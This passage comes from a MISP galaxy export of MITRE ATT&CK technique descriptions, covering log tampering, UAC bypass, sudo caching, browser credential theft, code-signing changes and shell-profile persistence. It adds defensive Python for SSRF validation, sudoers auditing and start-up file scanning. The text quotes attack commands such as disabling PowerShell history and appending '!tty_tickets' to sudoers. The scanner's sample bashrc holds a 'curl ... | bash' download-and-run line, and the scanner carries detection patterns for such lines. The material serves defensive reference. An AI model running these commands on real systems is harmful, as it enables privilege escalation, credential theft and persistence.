On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).

The tag is: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003"

Table 5493. Table References

Links

https://attack.mitre.org/techniques/T1562/003

https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit

https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7

Disable or Modify Tools - T1629.003

Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1629.003"

Table 5494. Table References

Links

https://attack.mitre.org/techniques/T1629/003

Bypass User Account Control - T1548.002

Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

  • <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002"

Table 5496. Table References

Links

http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

https://attack.mitre.org/techniques/T1548/002

https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

https://github.com/hfiref0x/UACME

https://msdn.microsoft.com/en-us/library/ms679687.aspx

https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works

User Activity Based Checks - T1497.002

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002"

Table 5497. Table References

Links

https://attack.mitre.org/techniques/T1497/002

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667

Cloud Instance Metadata API - T1552.005

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.
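Because the metadata service sits at a fixed link-local address, the SSRF case above is defended by refusing to fetch anything that resolves into link-local or otherwise internal ranges. The following Python is an added example for this page, not MITRE or MISP code: a target validator for a server-side URL fetcher that rejects literal addresses in those ranges (including IPv4-mapped IPv6), rejects hostnames whose resolved addresses land there, and takes a resolver as a parameter so the check runs offline against a constructed lookup table. The table, its hostnames and the integer-form entry are constructed; the metadata hostname listed is GCP's.

```python
"""Validate outbound fetch targets so an SSRF cannot reach the instance metadata service."""
import ipaddress
import socket
from typing import Callable, Dict, List
from urllib.parse import urlsplit

Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Every address the host resolves to (A and AAAA); one bad answer is enough to refuse."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Names that resolve to the metadata service on a provider (metadata.google.internal on GCP).
METADATA_HOSTNAMES = {'metadata.google.internal'}


def is_blocked_address(addr: str) -> bool:
    """Link-local (169.254.0.0/16, fe80::/10) is where the metadata API lives; loopback,
    private, reserved, multicast and unspecified ranges are refused too so the fetcher
    cannot be aimed at other internal services. IPv4-mapped IPv6 is unwrapped first."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_link_local or ip.is_loopback or ip.is_private
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_fetch_target(url: str, resolver: Resolver = system_resolver) -> bool:
    """True only for http(s) URLs whose host is a public address or resolves only to public ones."""
    parts = urlsplit(url)
    if parts.scheme not in ('http', 'https') or not parts.hostname:
        return False
    host = parts.hostname.lower().rstrip('.')
    if host in METADATA_HOSTNAMES:
        return False
    try:
        return not is_blocked_address(host)      # literal IPv4/IPv6 (brackets already stripped)
    except ValueError:
        pass                                     # not a dotted/colon literal: resolve it
    try:
        addrs = resolver(host)
    except OSError:                              # socket.gaierror is an OSError
        return False
    return bool(addrs) and not any(is_blocked_address(a) for a in addrs)


# Constructed lookup table standing in for DNS in the offline demo. The '2852039166' entry mirrors
# what a real resolver does with that integer spelling of 169.254.169.254: glibc's inet_aton
# accepts it, so the check has to run on resolved addresses, not on the text of the host.
FAKE_DNS: Dict[str, List[str]] = {
    'example.com': ['93.184.216.34'],
    'evil.test': ['169.254.169.254'],
    'dual.test': ['93.184.216.34', '10.0.0.5'],
    '2852039166': ['169.254.169.254'],
}


def fake_resolver(host: str) -> List[str]:
    if host not in FAKE_DNS:
        raise socket.gaierror(f'constructed NXDOMAIN for {host}')
    return FAKE_DNS[host]
```

Two caveats remain after this check. Validating and then letting an HTTP client resolve the name again is a time-of-check gap (DNS rebinding), so the fetcher should connect to the address it validated and re-run the check on every redirect. And on the provider side, AWS's IMDSv2 requires a session token obtained with a PUT and defaults the response hop limit to 1, which stops a plain GET forwarded through a web proxy from reaching the credentials path at all.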

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005"

Table 5498. Table References

Links

https://attack.mitre.org/techniques/T1552/005

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Exfiltration to Cloud Storage - T1567.002

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002"

Table 5499. Table References

Links

https://attack.mitre.org/techniques/T1567/002

Compromise Software Supply Chain - T1474.003

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1474.003"

Table 5500. Table References

Links

https://attack.mitre.org/techniques/T1474/003

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html

Sudo and Sudo Caching - T1548.003

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout (that is the macOS location; the timestamp directory is fixed when sudo is built, current Linux distributions commonly use <code>/run/sudo/ts</code>, and <code>sudo -V</code> run as root prints the directory in use). Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user’s password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. Additionally, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo 'Defaults !tty_tickets' >> /etc/sudoers</code>.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.
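The settings discussed above (<code>NOPASSWD</code> rules, <code>timestamp_timeout</code>, <code>!tty_tickets</code>, and the age of the timestamp file) can be checked from a copy of <code>sudoers</code> and a stat of the timestamp directory. The following Python is an added example for this page, not MITRE or MISP code: a small parser for global <code>Defaults</code> lines and user specifications, a findings function that applies the text's reasoning, and a timestamp-age check. The sudoers content is constructed and includes the exact lines the text quotes; the parser handles only global <code>Defaults</code> (not per-user or per-host variants) and the timestamp check uses file mtime, which on modern sudo is only an approximation because the file holds structured records.

```python
"""Audit sudoers for password-less paths and check whether the sudo timestamp cache is still warm."""
import os
import re
import tempfile
import time
from typing import Dict, List, Optional, Tuple

# Constructed sudoers content, not from a real host. The NOPASSWD line is the one the text
# quotes and the final line is the one the cited malware appended.
SAMPLE_SUDOERS = """Defaults env_reset
Defaults timestamp_timeout=15
%admin ALL=(ALL) ALL
user1 ALL=(ALL) NOPASSWD: ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app   # scoped, not flagged
Defaults !tty_tickets
"""

DEFAULTS_RE = re.compile(r'^Defaults\b(?P<rest>.*)$')
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*'
                     r'(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def _value(text: str):
    try:
        return float(text)
    except ValueError:
        return text


def parse_sudoers(text: str) -> Tuple[Dict[str, object], List[Dict[str, object]]]:
    """Global Defaults (on top of sudo's compiled-in 5-minute timeout and tty_tickets on) and rules."""
    defaults: Dict[str, object] = {'timestamp_timeout': 5.0, 'tty_tickets': True}
    rules: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()          # drop comments (also drops #include lines)
        if not line:
            continue
        m = DEFAULTS_RE.match(line)
        if m:
            for item in filter(None, (s.strip() for s in m.group('rest').split(','))):
                if '=' in item:
                    key, val = item.split('=', 1)
                    defaults[key.strip()] = _value(val.strip())
                elif item.startswith('!'):
                    defaults[item[1:]] = False
                else:
                    defaults[item] = True
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({'who': m.group('who'), 'runas': m.group('runas') or 'root',
                          'nopasswd': 'NOPASSWD:' in m.group('tags'),
                          'cmds': m.group('cmds').strip()})
    return defaults, rules


def findings(defaults: Dict[str, object], rules: List[Dict[str, object]]) -> List[str]:
    """Conditions the text describes as abusable; wording is this example's own."""
    out = []
    if not defaults.get('tty_tickets', True):
        out.append('tty_tickets disabled: a credential cached in one terminal is honoured in all of them')
    timeout = float(defaults.get('timestamp_timeout', 5.0))
    if timeout < 0:
        out.append('timestamp_timeout < 0: cached credentials never expire')
    elif timeout > 5:
        out.append(f'timestamp_timeout={timeout:g} minutes (default is 5)')
    for rule in rules:
        if rule['nopasswd'] and rule['cmds'] == 'ALL':
            out.append(f"{rule['who']} may run ALL as ({rule['runas']}) without a password")
    return out


def cache_still_valid(ts_path: str, timestamp_timeout: float, now: Optional[float] = None) -> bool:
    """True while the timestamp file is younger than timestamp_timeout minutes, i.e. while
    `sudo` would not prompt; a negative timeout never expires. ts_path is the per-user file
    under the timestamp directory (/var/db/sudo in the text; /run/sudo/ts on many Linux builds)."""
    try:
        mtime = os.stat(ts_path).st_mtime
    except FileNotFoundError:
        return False
    if timestamp_timeout < 0:
        return True
    return (now if now is not None else time.time()) - mtime < timestamp_timeout * 60


def demo_cache_check() -> Tuple[bool, bool]:
    """Constructed timestamp file: fresh, then aged one hour, against the 5-minute default."""
    path = os.path.join(tempfile.mkdtemp(), 'alice')
    open(path, 'w').close()
    fresh = cache_still_valid(path, 5)
    stale_time = time.time() - 3600
    os.utime(path, (stale_time, stale_time))
    return fresh, cache_still_valid(path, 5)
```

<code>sudo -l</code> as the user reports the effective rules after all includes and host matching, so for a real host compare the parser's view against that output; the value of the parser is in reviewing sudoers files pulled from many systems without a shell on each.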

The tag is: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003"

Table 5501. Table References

Links

https://attack.mitre.org/techniques/T1548/003

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

https://www.sudo.ws/

Credentials from Web Browsers - T1555.003

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018) Chrome 80 and later no longer DPAPI-protect each password directly: the stored values carry a <code>v10</code> prefix and are AES-256-GCM encrypted under a key kept (base64-encoded and DPAPI-wrapped) in the <code>Local State</code> file of the User Data directory, so <code>CryptUnprotectData</code> is applied to that key rather than to each stored password.

Adversaries have executed similar procedures for common web browsers such as Firefox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"

Table 5502. Table References

Links

https://attack.mitre.org/techniques/T1555/003

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata

https://github.com/putterpanda/mimikittenz

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign

Code Signing Policy Modification - T1553.006

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)

To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006"

Table 5503. Table References

Links

https://attack.mitre.org/techniques/T1553/006

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection

https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option

https://github.com/hfiref0x/TDL

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html

Unix Shell Configuration Modification - T1546.004

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. A user’s [Unix Shell](https://attack.mitre.org/techniques/T1059/004) executes several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH), a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use <code>/etc/profile</code> when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. With user-level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code>, which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file, which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution: adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.
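The audit a defender wants for this technique is a scan of exactly the start-up files listed above, as an added example that is not code from the MISP galaxy or ATT&CK; the indicator patterns, the SAMPLE_BASHRC content and the build_demo_tree() layout are constructed assumptions to be tuned to your environment.

```python
"""Audit the bash and zsh start-up files named above for injected commands.

Added example, not code from the MISP galaxy or ATT&CK. It walks the
system-wide and per-user start-up files the technique lists and flags lines
matching patterns typical of shell-profile persistence. The pattern list,
the SAMPLE_BASHRC content and the build_demo_tree() layout are constructed.
"""
import re
import tempfile
import time
from pathlib import Path

# System files sourced by login/interactive shells (bash and zsh).
SYSTEM_FILES = ["etc/profile", "etc/bashrc", "etc/zshenv", "etc/zprofile",
                "etc/zlogin", "etc/zlogout"]
SYSTEM_DIRS = ["etc/profile.d"]
# Per-user files, in the order the text describes them.
USER_FILES = [".bash_profile", ".bash_login", ".profile", ".bashrc",
              ".bash_logout", ".zprofile", ".zlogin", ".zshrc", ".zlogout"]

# Heuristic indicators (constructed). Order matters: the first match wins.
SUSPICIOUS = [
    (re.compile(r"(^|[\s;&|])(/tmp|/dev/shm|/var/tmp)/\S+"), "exec from temp dir"),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"), "download piped to shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\bnohup\b.*&\s*$"), "backgrounded nohup job"),
]

SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
alias ll='ls -la'
export PATH="$HOME/bin:$PATH"
nohup /tmp/.x/update >/dev/null 2>&1 &
curl -s http://example.invalid/i.sh | bash
"""


def scan_config_text(text, source="<inline>"):
    """Return (source, line_no, reason, line) for every suspicious line."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments never execute
        for pattern, reason in SUSPICIOUS:
            if pattern.search(line):
                findings.append((source, n, reason, line))
                break
    return findings


def candidate_files(home, root="/"):
    """Existing start-up files under root (system) and home (user)."""
    root, home = Path(root), Path(home)
    paths = [root / f for f in SYSTEM_FILES]
    for d in SYSTEM_DIRS:
        d = root / d
        if d.is_dir():
            paths.extend(sorted(p for p in d.iterdir() if p.is_file()))
    paths.extend(home / f for f in USER_FILES)
    return [p for p in paths if p.is_file()]


def audit_shell_configs(home, root="/", recent_days=None):
    """Scan every candidate file; optionally also report files modified
    within the last recent_days (a cheap triage signal after an incident)."""
    findings = []
    for p in candidate_files(home, root):
        try:
            text = p.read_text(errors="replace")
        except OSError:
            continue
        findings.extend(scan_config_text(text, str(p)))
        if recent_days is not None:
            if (time.time() - p.stat().st_mtime) < recent_days * 86400:
                findings.append((str(p), 0, "recently modified", ""))
    return findings


def build_demo_tree():
    """Create a throwaway root with constructed config files; returns (root, home)."""
    root = Path(tempfile.mkdtemp(prefix="shellaudit-"))
    (root / "etc" / "profile.d").mkdir(parents=True)
    (root / "etc" / "profile").write_text("export EDITOR=vi\n")
    (root / "etc" / "profile.d" / "zz-update.sh").write_text(
        "/var/tmp/.cache/sync >/dev/null 2>&1 &\n")
    home = root / "home" / "alice"
    home.mkdir(parents=True)
    (home / ".bashrc").write_text(SAMPLE_BASHRC)
    (home / ".zshrc").write_text("autoload -Uz compinit && compinit\n")
    return root, home


if __name__ == "__main__":
    demo_root, demo_home = build_demo_tree()
    for finding in audit_shell_configs(demo_home, demo_root):
        print(finding)
    # On a real host: audit_shell_configs(Path.home(), "/", recent_days=7)
```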

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004"

Table 5504. Table References

Links

https://attack.mitre.org/techniques/T1546/004

https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/

https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html

https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a

https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js

https://objective-see.com/blog/blog_0x48.html

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/

https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

https://wiki.archlinux.org/index.php/Bash#Invocation

https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Elevated Execution with Prompt - T1548.004

Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or that it has not been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

